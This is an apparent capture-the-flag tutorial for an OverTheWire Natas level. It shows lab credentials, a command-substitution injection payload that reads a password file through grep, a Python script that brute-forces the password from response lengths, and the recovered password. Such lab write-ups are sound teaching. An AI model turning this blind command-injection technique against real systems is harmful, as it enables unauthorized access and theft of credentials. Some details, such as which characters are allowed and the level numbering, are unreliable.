OverTheWire Natas Level 15 → 16 tutorial!!

Login

URL: http://natas16.natas.labs.overthewire.org
Credentials: natas16:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo

# Using curl (optional):
curl -u natas16:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo 
  http://natas16.natas.labs.overthewire.org/

Task

The page lets us search inside a dictionary with grep, but the input is filtered. Characters like ; | & \ ‘ “are blocked — yet$ ( )` are still allowed.

That means we can use command substitution: $( <command> ).

A little bit of Theory

From the source:

if(preg_match('/[;|&`\'"]/', $key)) {
    print "Input contains an illegal character!";
} else {
    passthru("grep -i \"$key\" dictionary.txt");
}

• passthru() runs our input inside grep.
• By injecting $(...), we can make grep’s pattern dynamic.
• Trick: use grep itself to test password prefixes from /etc/natas_webpass/natas17.

Approach

We inject payloads like:

$(grep -E ^<prefix>.* /etc/natas_webpass/natas17)

• If <prefix> matches the start of the password → inner grep prints the password → outer grep finds no matches → page is short.
• If not → output is empty → outer grep searches the dictionary normally → page is long.

So by measuring response length, we can brute-force the password.

Solution

Step 1: Manual test

Try:

$(echo test)

You’ll see lots of dictionary matches containing “test”.

Step 2: Automate with Python

import requests, sys
from string import ascii_lowercase, ascii_uppercase, digits

charset = ascii_lowercase + ascii_uppercase + digits
s = requests.Session()
s.auth = ('natas16', 'hPkjKYviLQctEW33QmuXL6eDVfMW4sGo')

password = ""
# adjust if your instance differs
TRUE_LEN = 1105

while len(password) < 32:
    for ch in charset:
        prefix = password + ch
        payload = {'needle': f'$(grep -E ^{prefix}.* /etc/natas_webpass/natas17)'}
        r = s.get('http://natas16.natas.labs.overthewire.org/index.php', params=payload)

        if len(r.text) == TRUE_LEN:
            sys.stdout.write(ch)
            sys.stdout.flush()
            password += ch
            break

Password

EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC

Troubleshooting

• Getting only “illegal character”? → Make sure payload doesn’t contain blocked symbols.
• Wrong length? → Print len(r.text) for true/false cases and adjust TRUE_LEN.
• Script stuck? → Double-check charset and the path /etc/natas_webpass/natas17.

Congrats 🎉 You’ve used a blind command injection oracle to recover the password for natas17!

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨